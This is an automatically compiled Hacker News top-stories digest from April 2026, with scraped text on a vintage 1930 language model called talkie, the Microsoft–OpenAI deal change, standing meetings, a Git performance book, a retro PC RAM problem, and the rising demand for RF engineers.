# Hacker News Top 30 — 2026-04-28

Generated on 2026-04-28 03:27 UTC

## [HN-TITLE] 1. Talkie: a 13B vintage language model from 1930

- **Source**: [https://talkie-lm.com/introducing-talkie](https://talkie-lm.com/introducing-talkie)
- **Site**: talkie-lm.com
- **Author**: Nick Levine, David Duvenaud, Alec Radford
- **Submitted**: 2026-04-27 21:55 UTC (Hacker News)
- **HN activity**: 128 points · [39 comments](https://news.ycombinator.com/item?id=47927903)
- **Length**: 2.4K words (~11 min read)
- **Language**: en

April 2026

This is a 24/7 live feed of Claude Sonnet 4.6 prompting [talkie-1930-13b-it](https://huggingface.co/talkie-lm/talkie-1930-13b-it) in order to explore its knowledge, capabilities, and inclinations. talkie’s outputs reflect the culture and values of the texts it was trained on, not the views of its authors.

## Why vintage language models?

Have you ever daydreamed about talking to someone from the past? What would you ask someone with no knowledge of the modern world? What would they ask *you*? While we don’t have time machines yet, we can simulate this experience by training, in Owain Evans’s phrase, [‘vintage’ language models](https://owainevans.github.io/talk-transcript.html): LMs trained only on historical text.

These models are fascinating conversation partners (watch Claude prompt talkie, our 13B 1930 LM, in the widget above). But we are also excited by the possibility that the careful study of the behaviors and capabilities of vintage LMs will advance our understanding of AI in general.

Figure 1. In an early attempt to understand a vintage model’s anticipation of the future, we took nearly 5,000 historical event descriptions from the *New York Times’s* [“On This Day” feature](https://archive.nytimes.com/learning.blogs.nytimes.com/on-this-day/), calculated their surprisingness (measured as bits per byte of text) to our 13B model trained exclusively on pre-1931 text, and binned by decade.

For example, we can evaluate LMs’ ability to predict the future. Inspired by Calcifer Computing’s work on [Temporal Language Models](https://www.calcifercomputing.com/reports/tlm), we calculated the surprisingness of short descriptions of historical events to a 13B model trained on pre-1931 text (Figure 1). We can see an increase after the knowledge cutoff, particularly pronounced in the 1950s and 1960s, followed by a plateau. We will continue to develop evals to measure with greater confidence how forecasting performance improves with model size and decays at longer horizons. Training larger vintage language models will allow us to uncover these scaling trends.

![Turing’s On Computable Numbers (1936), Carlson’s xerography patent (1942), and Sikorsky’s helicopter patent (1935)](https://talkie-lm.com/images/papers-composite.png)

Figure 2. Patents and a paper published after talkie’s knowledge cutoff. Left to right: helicopter patent (Sikorsky, 1935), Turing machines paper (Turing, 1936), xerography patent (Carlson, 1942).

Similarly, we can test LMs’ abilities to come up with new ideas by seeing if they can arrive at inventions or scientific discoveries we know would arise after their knowledge cutoffs, such as those pictured in Figure 2. As Demis Hassabis has asked, could a model trained up to 1911 independently discover General Relativity, as Einstein did in 1915?

Figure 3. We gave a Python programming test ([HumanEval](https://github.com/openai/human-eval)) to a series of pairs of vintage models (trained on pre-1931 text) and modern models (trained on the web), which have the same architecture. Left: This chart shows what percentage of problems each model would get right at least once, given 100 chances and randomly chosen Python functions as examples to learn from in-context. Right: An example of a successful solution to a Python coding problem produced by a vintage language model. The model had access to several other in-context examples to learn from.

[Contamination](https://arxiv.org/abs/2602.12413) is a persistent problem for language models and causes us to overestimate the capabilities of LMs. Vintage LMs are contamination-free by construction, enabling unique generalization experiments, like examining whether a model with no knowledge of digital computers can learn to code in a modern programming language. Figure 3 (left-hand side) shows an early example of such a test, measuring how well models trained on pre-1931 text can, when given a few demonstration examples of [Python programs](https://github.com/openai/human-eval), write new correct programs. While vintage models dramatically underperform models trained on web data (which includes code), we’ve found that they are slowly but steadily improving at this task with scale.

There is still a long way to go before this capability is notable, however. All correct solutions generated by the vintage models are simple one-line programs (such as adding two inputs), or small modifications to in-context example programs. For instance, our model implemented the decoding function of a rotation cipher when [given the encoding function](https://huggingface.co/datasets/openai/openai_humaneval/viewer/openai_humaneval/test?row=50). Although the solution (Figure 3, right-hand side) is only a single character edit (swapping an addition for a subtraction), this success suggests an understanding of inverse functions. We hope LMs with early knowledge cutoffs help the research community understand how well LMs can generalize beyond their pre-training data.

Vintage language models could also teach us about the impact of data diversity in AI development. While modern models vary in disposition, capability, and behavior, they are all closely related to one another by having been trained, whether directly or indirectly (via distillation and synthetic data), on the web. How does this shape and constrain what they are? How much of what we think we know about LMs is about human language and culture in general, or about this one dataset—the web—in particular? Training on different sources may lead to very different kinds of models being created. Studying the ways in which they are similar and different could improve our understanding of language model personas, behaviors, and dispositions.

## Introducing talkie

We have been excited to see a proliferation of vintage LM projects, including [Ranke-4B](https://github.com/DGoettlich/history-llms/tree/main), [Mr. Chatterbox](https://www.estragon.news/mr-chatterbox-or-the-modern-prometheus/), and [Machina Mirabilis](https://michaelhla.com/blog/machina-mirabilis.html).

Alongside these efforts, we introduce [talkie-1930-13b-base](https://huggingface.co/talkie-lm/talkie-1930-13b-base), a 13B language model trained on 260B tokens of historical pre-1931 English text. Additionally, we present a post-trained [checkpoint](https://huggingface.co/talkie-lm/talkie-1930-13b-it) turning our base model into a conversation partner without relying on modern chat transcripts or instruction-tuning data.

talkie is the largest vintage language model we are aware of, and we plan to continue scaling significantly. As a next step, we are training a GPT-3-level model, which we hope to release this summer. A preliminary estimate also suggests we can grow our corpus to well over a trillion tokens of historical text, which should be sufficient to create a GPT-3.5 level model—similar in capability to the original ChatGPT.

## Benchmarking an LM from 1930

Figure 4. Evaluation accuracy vs. training compute for talkie-1930 (Vintage LM) and its [modern twin trained on FineWeb](https://huggingface.co/talkie-lm/talkie-web-13b-base). The vintage model underperforms the modern model on knowledge evals. Filtering out questions anachronistic from the perspective of 1930 roughly halves the performance gap between the vintage and modern models.

To contextualize talkie’s capabilities, we built a “[modern twin](https://huggingface.co/talkie-lm/talkie-web-13b-base)” that is identical architecturally but trained on modern web data (FineWeb) instead of pre-1931 text. On average, talkie underperforms its modern counterpart in standard LM evaluations, even after correcting for question anachronism, despite being trained with the same number of FLOPs (see Figure 4). But we have been encouraged by its similar performance on core language understanding and numeracy tasks.

We suspect a combination of differences in data quality (poor optical character recognition) and corpus subject matter distribution explains why talkie-1930 underperforms on some benchmarks. To maximize the compute efficiency of future vintage language model training, we are developing a vintage optical character recognition (OCR) system to improve the quality of transcription of historical text.

## Collecting vintage data

Piggybacking off the invaluable work of organizations like the [Institutional Data Initiative](https://huggingface.co/datasets/institutional/institutional-books-1.0) and the [Internet Archive](https://archive.org/about/) and efforts like [Common Pile](https://huggingface.co/common-pile), we have collected hundreds of billions of pre-1931 English-language tokens. These include books, newspapers, periodicals, scientific journals, patents, and case law. We chose the end of 1930 as the cutoff date because that is when works enter the public domain in the United States. For this version of the model, we also limited ourselves to primarily English-language texts, because validating the data pipeline requires deep familiarity with source documents, and we are native English speakers. But multilingual corpus expansion is a high priority, both to increase the size of the corpus and the diversity of perspectives it represents.

## Training vintage language models

Developing vintage language models presents unique challenges. Here, we discuss some of them in brief. We will follow up in greater detail in the coming months as we continue our research.

### Temporal leakage

Who was president of the United States in 1936, and what were the most significant pieces of legislation he signed?

Franklin D. Roosevelt was president of the United States from 1933 to 1937. The most important legislation signed by him was the National Recovery Act of 1933; the Agricultural Adjustment Act of 1935; and the Emergency Banking Act of 1935 (amended in 1936).

Figure 5. talkie-1930-13b’s knowledge of the Roosevelt presidency and New Deal is an example of imperfect filtering of the pre-training corpus.

The most important objective when training vintage language models is that no data leaks into the training corpus from after the intended knowledge cutoff (in our case, December 31st, 1930). There are several ways this can happen, such as including modern documents with faulty date metadata, or old documents with post hoc anachronistic insertions like editorial introductions or footnotes.

For talkie-1930, we developed a document-level n-gram-based anachronism classifier and used it to filter the pre-training corpus. However, this was not perfect. An earlier 7B version of talkie clearly knew about the Roosevelt presidency and New Deal legislation (Figure 5). talkie-1930-13b is additionally aware of some details related to World War II and the immediate postwar order (the United Nations and the division of Germany). For future versions of the model, we are developing new techniques for leakage detection and filtering using more advanced classifiers.

### Data quality

Figure 6. OCR errors reduce language model learning efficiency. Left: Training LMs on pre-1931 texts transcribed using conventional OCR systems only shows 30% of the learning efficiency of a model trained on human-transcribed versions of the same texts. Regex cleaning of the OCR’d text recovers some performance. Right: Example of a messy machine transcription of *The Wonderful Wizard of Oz* (Baum, 1899).

Data quality is an important issue for all machine learning experiments. It is a special challenge when training vintage language models. Because there was no digital publishing in 1930, all text in our dataset had to be transcribed from a physical source, which introduces a form of noise not seen in natively digital text. While OCR was an early success story of machine learning and computer vision, the classic OCR systems often used to transcribe historical documents struggle on all but the simplest layouts and cleanest scans. Modern VLM-based systems have higher accuracy, but we have found they are prone to hallucinate modern facts into our corpus, poisoning the exercise.

In controlled experiments, we have found that when training an LM on pre-1931 texts transcribed using conventional OCR systems, for a given amount of compute, they only achieve 30% of the performance of a model trained on human-transcribed versions of the same texts (see Figure 6). Simple regex cleaning brings that number up to 70%—still a large discrepancy. We aim to shrink the remaining gap in performance by retranscribing the talkie corpus using our vintage OCR system.

### Vintage post-training

![Title pages of books used in vintage post-training: Beadle’s Dime Book of Practical Etiquette, Henley’s Twentieth Century Formulas, How to Behave and How to Amuse, and The New Century Standard Letter-Writer](https://talkie-lm.com/images/posttraining-composite.png)

Figure 7. Examples of historical reference texts with regular structure used for post-training. Left to right: etiquette manual (Beadle, 1859), practical knowledge book (Henley, 1914), parlor guide (Sandison, c. 1895), letter-writing manual (Chambers, 1900).

The lack of ready-made post-training data is another significant challenge. Fine-tuning our base model on off-the-shelf instruction-response pairs would bake in anachronistic knowledge, style, and expectations of what a chat assistant ought to be like. Rather than attempting to filter out these biases, we built a post-training pipeline from scratch.

First, we generated instruction-response pairs from historical texts with regular structure, such as etiquette manuals, letter-writing manuals, cookbooks, dictionaries, encyclopedias, and poetry and fable collections (see Figure 7), and fine-tuned our base model on them using a simple chat format.

Next, to improve instruction-following abilities, we generated synthetic prompts covering different types of tasks, such as summarizing documents, responding to direct information requests, and continuing multi-turn conversations coherently. We then ran online direct preference optimization on rollouts generated from these prompts, using Claude Sonnet 4.6 as a judge. Over the course of training, on a held-out eval set, the judge’s average instruction-following rating of talkie’s responses increased from 2.0 to 3.4 (on a five-point scale).

Finally, we did another round of supervised fine-tuning, this time on rejection-sampled multi-turn synthetic chats between Claude Opus 4.6 and talkie, to smooth out persistent rough edges in its conversational abilities.

While we have tried to post-train talkie free from modern influence, reinforcement learning with AI feedback inevitably shapes talkie’s behavior anachronistically. (The 7B version of talkie emerged from RL speaking in listicles.) As we scale up, we hope to be able to use our vintage base models themselves as judges to enable a fully bootstrapped era-appropriate post-training pipeline.

## Scaling talkie

We plan to scale talkie rapidly in the coming months. This will entail:

- Increasing the size of our English-language corpus, and expanding it beyond English.
- Re-OCR’ing as much of pre-1931 text as is feasible using our new OCR system.
- Strengthening the leakage detection pipeline by developing new anachronism classification techniques.
- Expanding and refining the vintage post-training pipeline in collaboration with historians, including by developing methodologies for constructing accurate historical personas.

## Join us

We are excited to collaborate with researchers and institutions to build the next generation of vintage language models. Please [get in touch](mailto:hello@talkie-lm.com).

- Are you a researcher or institution with historical texts? We’d love to discuss how we can help make them accessible to researchers and readers, including by applying our OCR model.
- Are you an individual or institution interested in supporting vintage language model development with funding or compute? We can likely use either, or put you in touch with other teams working in the space.
- Are you an academic in the humanities? We are excited to discuss how vintage language models, and the data and infrastructure used to train them, could be useful for your research.
- Are you an AI researcher? We would love to support and collaborate on research on training and [studying vintage language models](https://github.com/talkie-lm/talkie).
- Are you an artist or writer? We think vintage language models could be fruitful tools to [experiment with](https://github.com/talkie-lm/talkie).

## Content considerations

talkie reflects the culture and values of the texts it was trained on. As such, it can produce outputs that will be offensive to users.

## Acknowledgements

Thanks to Coefficient Giving and Anthropic for support with funding and compute.

For helpful discussions, we thank Pranav Anand, Benjamin Breen, Catherine Brobston, Collin Burns, Matteo Cargnelutti, Mackenzie Cooley, Brandon Duderstadt, Owain Evans, Chloë Farr, Ryan Greenblatt, Michael Hla, Mark Humphries, Sam Klein, Greg Leppert, Jack Lindsey, Christina Lu, Seoirse Murray, Jake Naviasky, Krishna Patel, Ethan Perez, Puria Radmard, Ludwig Schmidt, Buck Shlegeris, Benjamin Sturgeon, Daniel Tan, Ross Taylor, Cam Tice, Trip Venturella, Merlijn Wajer, and Tao Xu.

## Citation

```
@article{levine2026talkie,
  title={Introducing talkie: a 13B vintage language model from 1930},
  author={Levine, Nick and Duvenaud, David and Radford, Alec},
  year={2026},
  month={April},
  url={https://talkie-lm.com/introducing-talkie}
}
```

---

## [HN-TITLE] 2. Microsoft and OpenAI end their exclusive and revenue-sharing deal

- **Source**: [https://www.bloomberg.com/news/articles/2026-04-27/microsoft-to-stop-sharing-revenue-with-main-ai-partner-openai](https://www.bloomberg.com/news/articles/2026-04-27/microsoft-to-stop-sharing-revenue-with-main-ai-partner-openai)
- **Site**: Bloomberg
- **Author**: Matt Day
- **Published**: 2026-04-27
- **HN activity**: 779 points · [677 comments](https://news.ycombinator.com/item?id=47921248)
- **Length**: 133 words (~1 min read)
- **Language**: en

AI

OpenAI CEO Sam Altman, left, speaks with Microsoft Chief Technology Officer Kevin Scott during the Microsoft Build conference in Seattle in 2024. 

Photographer: Jason Redmond/AFP/Getty Images

April 27, 2026 at 1:14 PM UTC

Updated on

April 27, 2026 at 2:36 PM UTC

[Microsoft Corp.](https://www.bloomberg.com/quote/MSFT:US) and OpenAI have agreed to drop the software giant’s exclusive right to sell the startup’s AI models, opening the door for the ChatGPT maker to pursue deals with cloud-computing rivals like [Amazon.com Inc.](https://www.bloomberg.com/quote/AMZN:US)

In exchange for ending that exclusivity — which helped boost Microsoft’s cloud sales in the early years of the AI boom — the world’s largest software maker will no longer pay a revenue share on OpenAI products it resells on its cloud. The two companies announced the revised deal in a joint [statement](https://openai.com/index/next-phase-of-microsoft-partnership/ "The next phase of the Microsoft OpenAI partnership") on Monday.

---

## [HN-TITLE] 3. Integrated by Design

- **Source**: [https://vivianvoss.net/blog/integrated-by-design-launch](https://vivianvoss.net/blog/integrated-by-design-launch)
- **Site**: vivianvoss.net
- **Submitter**: vermaden (Hacker News)
- **Submitted**: 2026-04-27 23:14 UTC (Hacker News)
- **HN activity**: 75 points · [27 comments](https://news.ycombinator.com/item?id=47928554)

> no extractable content

---

## [HN-TITLE] 4. Meetings are forcing functions

- **Source**: [https://www.mooreds.com/wordpress/archives/3734](https://www.mooreds.com/wordpress/archives/3734)
- **Site**: mooreds.com
- **Submitter**: zdw (Hacker News)
- **Submitted**: 2026-04-26 03:12 UTC (Hacker News)
- **HN activity**: 67 points · [28 comments](https://news.ycombinator.com/item?id=47906942)
- **Length**: 274 words (~2 min read)
- **Language**: en-US

A recurring meeting serves as a powerful forcing function for long-running projects.

Many organizations face a common challenge: a complex project that requires effort and perspectives from multiple people, moves through definition and execution phases, and unfolds over weeks, months, or years. But one where the tasks to accomplish the project are not anyone’s full-time job.

Everyone has other obligations, fires to put out, and emails to answer. It’s easy for long-term strategic, high-impact work to sink to the bottom of everyone’s todo list.

One effective solution is to schedule a standing meeting. Whether in person or video, it doesn’t matter. The key to making progress is maintaining an agenda and, critically, opening each meeting by reviewing the to-dos from the previous one. This creates pressure on everyone to make progress. When people know they’ll be asked “what’s the status of X that we talked about last week?” at an upcoming meeting, it is easier, though not easy, to carve out time for that work amid the daily chaos.

This approach works across organizational boundaries too. If you’re a consulting firm, a regular cadence of meetings with your client is especially valuable. You’re  motivated to deliver., but people on the client’s team may be less so. A meeting where you consistently show progress while they haven’t made any creates gentle but real accountability.

If you’re managing a large, complex, multi-person effort, consider the standing meeting. As far as schedule, weekly, bi-weekly, or monthly all have worked for me in the past. Pick whatever fits the urgency.

Use a meeting as a forcing function to ensure people actually make time to move the project forward.

---

## [HN-TITLE] 5. Ted Nyman – High Performance Git

- **Source**: [https://gitperf.com/](https://gitperf.com/)
- **Site**: gitperf.com
- **Submitter**: gnabgib (Hacker News)
- **Submitted**: 2026-04-28 00:32 UTC (Hacker News)
- **HN activity**: 30 points · [6 comments](https://news.ycombinator.com/item?id=47929035)
- **Length**: 321 words (~2 min read)
- **Language**: en

![Pencil sketch of a sailboat moored near a dock with shoreline buildings in the distance.](https://gitperf.com/index-art.png)

Git looks like a version-control tool. It is also a content-addressed database, a filesystem cache, a graph walker, and a transfer protocol.

This book is about those layers and the performance costs of each one. It starts with objects, refs, the index, and history traversal, then moves outward into packfiles, maintenance, sparse working trees, partial clone, transport, repository scale, diagnosis, configuration, and recovery.

It is written for engineers who need Git to stay fast as repositories, histories, and teams get larger: build and CI engineers, monorepo owners, developer-experience teams, and the people who wind up debugging strange Git behavior when the easy explanations stop working.

* * *

### Section 0 · Introduction

0. [Introduction](https://gitperf.com/chapter-00.html)

### Section I · Foundations

Why Git gets slow, what Git stores, and how refs and the index steer through it.

1. [Why Git Performance Matters](https://gitperf.com/chapter-01.html)
2. [Git's Core Data Model](https://gitperf.com/chapter-02.html)
3. [Refs, HEAD, Reflogs, Index](https://gitperf.com/chapter-03.html)

### Section II · History and Rewrite

How Git walks history and how rewrite commands reshape it without mutating commits.

4. [Revisions and History Traversal](https://gitperf.com/chapter-04.html)
5. [Merge, Rebase, Cherry-Pick, Rewrite](https://gitperf.com/chapter-05.html)

### Section III · Storage and Local Scale

Object storage, index cost, maintenance, and the techniques that shrink local state.

06. [Loose Objects, Packfiles, Delta Compression](https://gitperf.com/chapter-06.html)
07. [The Index as a Performance Structure](https://gitperf.com/chapter-07.html)
08. [Commit-Graph, Bloom Filters, MIDX, Bitmaps](https://gitperf.com/chapter-08.html)
09. [Git GC and Maintenance](https://gitperf.com/chapter-09.html)
10. [Sparse-Checkout and Sparse-Index](https://gitperf.com/chapter-10.html)

### Section IV · Large-Repo Operations, Transport, and Scale

Clone shape, transfer policy, parallel work with worktrees, repository size, and ref scale.

11. [Partial Clone and Promisor Remotes](https://gitperf.com/chapter-11.html)
12. [Scalar, Prefetch, Large Repositories](https://gitperf.com/chapter-12.html)
13. [Worktrees](https://gitperf.com/chapter-13.html)
14. [Clone, Fetch, Push, Protocol v2](https://gitperf.com/chapter-14.html)
15. [Bundles and Bundle URIs](https://gitperf.com/chapter-15.html)
16. [Reducing Repository Size](https://gitperf.com/chapter-16.html)
17. [Large Ref Sets: Files, Packed-Refs, Reftable, and `git refs`](https://gitperf.com/chapter-17.html)

### Section V · Diagnosis and Recovery

How to instrument Git, find the slow layer, apply high-leverage settings, and recover when the repository is actually wrong.

18. [Instrumenting Git](https://gitperf.com/chapter-18.html)
19. [Finding and Fixing Slow Git](https://gitperf.com/chapter-19.html)
20. [Configuration Playbook](https://gitperf.com/chapter-20.html)
21. [Recovery and Repair](https://gitperf.com/chapter-21.html)

### Back Matter

- [Epilogue: Git in the Agent Loop](https://gitperf.com/epilogue.html)
- [Appendix: Compatibility Guidance](https://gitperf.com/appendix-version-requirements.html)
- [Appendix: Approaches to Virtualized Working Trees](https://gitperf.com/appendix-virtualized-working-trees.html)
- [Glossary of Git Terms](https://gitperf.com/glossary.html)

---

## [HN-TITLE] 6. Three men are facing charges in Toronto SMS Blaster arrests

- **Source**: [https://www.tps.ca/media-centre/stories/unprecedented-sms-blaster-arrests/](https://www.tps.ca/media-centre/stories/unprecedented-sms-blaster-arrests/)
- **Site**: tps.ca
- **Submitter**: gnabgib (Hacker News)
- **Submitted**: 2026-04-27 20:44 UTC (Hacker News)
- **HN activity**: 119 points · [52 comments](https://news.ycombinator.com/item?id=47927070)

> scrape failed: http 403

---

## [HN-TITLE] 7. Is my blue your blue?

- **Source**: [https://ismy.blue/](https://ismy.blue/)
- **Site**: ismy.blue
- **Submitter**: theogravity (Hacker News)
- **Submitted**: 2026-04-27 20:24 UTC (Hacker News)
- **HN activity**: 380 points · [256 comments](https://news.ycombinator.com/item?id=47926861)
- **Language**: en

> no extractable content

---

## [HN-TITLE] 8. Mo RAM, Mo Problems (2025)

- **Source**: [https://fabiensanglard.net/curse/](https://fabiensanglard.net/curse/)
- **Site**: fabiensanglard.net
- **Submitter**: blfr (Hacker News)
- **Submitted**: 2026-04-25 15:41 UTC (Hacker News)
- **HN activity**: 25 points · [4 comments](https://news.ycombinator.com/item?id=47902269)
- **Length**: 537 words (~3 min read)

Feb 16, 2025

Mo RAM, mo problems

* * *

As a retro-computer enthusiast, it seems that parts are either insanely expensive or dirt cheap. If the first case has obvious problems, the second can also lead to issues.

When I built the [Quake PC](https://fabiensanglard.net/quake_pc), the motherboard and HDD were worth their weight in gold. But the price of RAM modules was ridiculously low. So I maxed out by buying $40,000 worth of 1997 SDRAM, namely 384 MiB, for the price of $60.

From 44 fps to 33 fps

* * *

After I got the machine working, I ran benchmarks for weeks. I was constantly swapping video-cards, changing RAM types (SDRAM, EDO), adding RAM, removing RAM, and testing different CPUs. The CPU in my collection that ran Quake the best was the Pentium MM 233MHz clocking demo1 at **44.6 fps**. That figure was consistent with benchmarks of the era.

I wrote an [article about winquake](https://fabiensanglard.net/winquake) then took a break from 1997. A month later I had the idea to measure Michael Abrash assembly optimizations. I ran the same benchmark again. But this time I measured **33 fps**. That was nearly 25% slower. What happened?

Troubleshooting

* * *

I tried pretty much everything I could think of. I swapped the graphic card, removed all the 3D accelerators, updated the drivers, downgraded the drivers, wiped the whole system, re-installed everything, double checked that I was still using the MMX 233Mhz, and verified the frequency multiplier. Still **33 fps**.

Did a RAM module go bad? I tried to remove one of them. **33 fps**. Remove a second one (leaving only one). Now the game ran at **44 fps**. Two modules going bad? Hm, that seems weird. I tried to swap modules, leaving only one in the machine. All of them ran the game a **44 fps**. Only when two of more are in the machine, the framerate drops back to **33 fps**.

Epiphany

* * *

I vaguely remembered something about having too much RAM from the excellent *Upgrading and Repairing PCs 10th edition*.

> That last issue is one that many people are not aware of. The 430FX chipset can only cache up to 64M of main memory. This means that if you install more than 64M of RAM in your system, performance will suffer greatly.
> 
> Now, many think this won’t be that much of a problem—after all, they don't normally run enough software to load past the first 64M anyway. That is another misunderstanding, because Windows 95 and NT load from the top down.
> 
> This means, for example, that if you install 96M of RAM (one 64M and one 32M bank), then virtually all of your software, including the main operating system, will be loading into the non-cached region above 64M. Only if you use more than 32M would you begin to see an improvement in performance. tem.
> 
> - Upgrading and Repairing PCs 10th edition

My motherboard, an XA100, is from 1998 and advertised[\[1\]](#footnote_1) as supporting caching of 512MiB, but there is clearly something amiss there. It seems it actually can only cache in the neighborhood of 128 MiB. Which means any amount over that, made everything run without a L2 cache!

And that is the story of how I made that PC faster, by removing RAM.

References

* * *

* * *

\*

---

## [HN-TITLE] 9. The quiet resurgence of RF engineering

- **Source**: [https://atempleton.bearblog.dev/quiet-resurgence-of-rf-engineering/](https://atempleton.bearblog.dev/quiet-resurgence-of-rf-engineering/)
- **Site**: Anthony T's Blog
- **Submitter**: merlinq (Hacker News)
- **Submitted**: 2026-04-25 18:25 UTC (Hacker News)
- **HN activity**: 153 points · [84 comments](https://news.ycombinator.com/item?id=47903439)
- **Length**: 1.8K words (~9 min read)
- **Language**: en

*14 Apr, 2026*

I've worked in the aerospace industry for the past 8 years, and for most of that time I felt like I could confidently say that RF engineering felt like it was a quiet, non evolving field. The advice I heard early on, and that I watched a lot of other people follow, was to go into software. Machine learning, cloud infrastructure, web development. That's where the growth was, that's where the money was, and honestly, that's where most new graduates went (myself included at the time). I studied Information Systems in college, not electrical engineering. RF was nowhere on my radar.

But aerospace has a way of pulling you into hardware whether you planned on it or not. I started my career at NASA, building telemetry platforms, ETL pipelines, and spacecraft visualization tools. Pure software work. Then I moved to a private aerospace company. Much smaller than NASA (approx 130 employees at the time I joined), and it required me to wear a ton of hats to work on ground systems. That's where things shifted. When you're responsible for ground station services, even when most of it now is *software defined* you can't stay in the software lane entirely. I found myself doing link budget analysis, troubleshooting RF anomalies, and developing a working understanding of the RF hardware chain that I never expected to need.

That experience is part of why I've been paying attention to what's happening in RF more broadly. I've been feeling a shift over the past several years — more demand, fewer people, and more urgency from the companies I talk to. RF engineering is not only alive, it's rebounding in a significant way. I wanted to dig into whether my gut feeling here is actually backed by data, or if I'm just seeing what I want to see from inside the aerospace bubble.

## What Actually Happened to RF

To be fair to the people who called RF a shrinking field, they weren't wrong, at least for a stretch. After the dot-com bust in the early 2000s, the telecom industry consolidated hard. Companies merged, manufacturing moved offshore, and a lot of RF design work either disappeared or got absorbed into a handful of large defense contractors. The broader electrical engineering job market stagnated. [Electronic Design](https://www.electronicdesign.com/technologies/embedded/article/21255051/electronic-design-electronics-and-electrical-engineering-jobs-on-the-declinecan-they-be-saved) has documented this trend not just for RF, but across EE as a whole. I feel confident that if the field as a whole is shrinking, then the subfield of RF was also in decline.

And then software exploded. The engineers who might've gone into EE or RF design a generation earlier went down the software "FAANG" route instead. University enrollment in RF specific coursework drifted down. Though I'll be honest, hard numbers on this are annoyingly hard to find so this is more of my gut assumption. What we do know is that today, companies [openly describe the difficulty](https://filtronic.com/blogs_challenges-of-recruiting-rf-engineers/) of recruiting RF engineers, pointing to a generation that chose software over EE.

But here's the thing that gets missed in the narrative: it never actually went away. The defense sector has been keeping it alive this entire time. Raytheon, Lockheed Martin, Northrop Grumman, these companies never stopped hiring people who understand beam patterns, power amplifiers, and antenna design. The majority of RF engineering job postings have historically come from aerospace and defense. RF didn't die. It just receded from the civilian sector while quietly remaining essential to national security and defense.

## So What Changed

The resurgence didn't come from one place. It's coming from several industries all hitting the same wall at roughly the same time; a shortage of engineers who can work at the hardware level.

### The Space Boom

This is the one I see most directly in my work, and it *feels* the most dramatic. In 2015, roughly [260 spacecraft were launched](https://ourworldindata.org/grapher/yearly-number-of-objects-launched-into-outer-space) into space globally. By 2024, that number hit approximately 2,695. A 10x increase in under a decade. The overwhelming majority of that growth came from commercial constellations, with SpaceX's Starlink deploying over 1,500 satellites in 2023 alone.

Every single one of those satellites needs RF hardware. Starlink operates in Ku-band for user links and Ka-band for gateways, with V-band planned for Starlink V2. Kuiper and OneWeb follow similar architectures in Ka-band. Each spacecraft carries transceivers, antennas, filters, and amplifiers — and each ground station that talks to them needs the same. The amount of RF hardware per spacecraft adds up fast, and the launch cadence isn't slowing down.

The money tells the same story. The global space economy hit a record [$613 billion in 2024](https://www.spacefoundation.org/2025/07/22/the-space-report-2025-q2/), with commercial making up roughly 78% of that. The [space based RF market](https://www.openpr.com/news/4298716/space-based-rf-and-microwave-technology-market-size-share) alone was valued at $18.6 billion and is projected to nearly double by 2033.

And it's not just commercial. On the defense side, the Space Development Agency is building the [Proliferated Warfighter Space Architecture](https://payloadspace.com/ndsa-explainer/) — a LEO constellation targeting 500+ satellites. Only a few dozen are on orbit today, but nearly $35 billion has been committed through 2029. Even with the growing push toward optical links, these spacecraft still carry RF communications hardware and telemetry payloads, and that is unlikely to change anytime soon.

### 5G Wide Adoption

I think 5G's impact on RF demand is genuinely understated. A typical 4G base station has 2 or 4 transmit-receive chains. A 5G MIMO radio integrates anywhere from 64 to 256. That's an 8x to 16x increase in the power amplifiers, low-noise amplifiers, and antenna switches needed per installation. Multiply that across [642 operators and 374 commercial launches](https://gsacom.com/technology/5g/), and you start to see why the [RF component market](https://www.mordorintelligence.com/industry-reports/rf-components-market) is pushing toward $50 billion with no signs of stoppage.

The design challenges make it worse. Millimeter wave frequencies introduce path loss that demands arrays with manufacturing tolerances at the millimeter scale. Additionally, thermal management, ex. dissipating 300+ watts from tower-mounted hardware with passive cooling, isn't something you can solve reliably in software.

### 6G Is Already In The Works

It's early, but 6G isn't vaporware. [3GPP](https://www.3gpp.org/specifications-technologies/releases/release-20) has been actively working on 6G study items since 2024, with first specifications targeted for late 2028 and commercial deployments expected around 2030. The EU, South Korea, and major telecom players like Ericsson, Nokia, and Samsung are all investing heavily into this research.

The RF challenges are genuinely new territory. Sub-terahertz frequencies and [integrated sensing and communication](https://www.ericsson.com/en/blog/2024/6/integrated-sensing-and-communication) (ISAC), which 3GPP officially scoped into 6G in the middle of last year, push well beyond what current design tools can handle. Worth noting though — the original vision for sub-THz has already been [scaled back](https://the-mobile-network.com/2026/04/6g-reality-check-and-update/) from outdoor cellular to mostly short-range indoor use cases like data centers and factories. But even with a narrower scope, all of this research eventually has to become hardware, and the people who know how to do that are already stretched thin.

### The "Drivers" That Don't Get Headlines

Space and cellular seem to dominate the conversation, but there are quieter contributors that I think are what make this feeling more durable rather than cyclical.

Automotive radar is a sneaky one. The EU now [mandates automatic emergency braking](https://spectrum.ieee.org/europe-mandates-automatic-emergency-braking) in all new vehicles and, while the regulation is *technically* sensor-agnostic, most implementations rely on radar. Every new car with adaptive cruise control or collision avoidance has RF hardware running on board. That market alone is projected to hit $7+ billion this year. Then there's Wi-Fi 7, operating across three bands simultaneously, and the ever expanding IoT landscape with over 21 billion connected devices as of 2025. Anything that communicates wirelessly needs RF work behind it, and that list just keeps growing.

## The Talent Shortage

What makes this an interesting pattern, is that the supply side is genuinely broken. [IEEE survey data](https://k2staffinginc.com/electrical-engineering-talent-shortages-how-recruiters-bridge-the-gap/) shows 73% of EE employers can't fill positions within six months, up from 45% five years ago. [EE Times](https://www.eetimes.com/engineer-demand-exposes-talent-gap-in-rf-development/) has reported specifically on the RF talent gap and its growing demand.

And it's not just direct competition for RF roles either. RF and semiconductor careers often pull from the same shrinking pool of EE graduates, and right now the semiconductor side is in a hiring frenzy of its own. The CHIPS Act has poured billions into domestic fab expansion, AI chip demand is exploding, and the semiconductor industry is projecting a [67,000 worker shortfall by 2030](https://www.semiconductors.org/chipping-away-assessing-and-addressing-the-labor-market-gap-facing-the-u-s-semiconductor-industry/). All of that competes directly with RF employers for the same talent. When everyone is fighting over the same small group of EE grads, RF companies, which tend to be smaller and less visible than the big chip fabs, often lose out.

Salaries reinforce this. Average RF engineer comp is pushing past $130K, with top-end design positions listing above $200K.

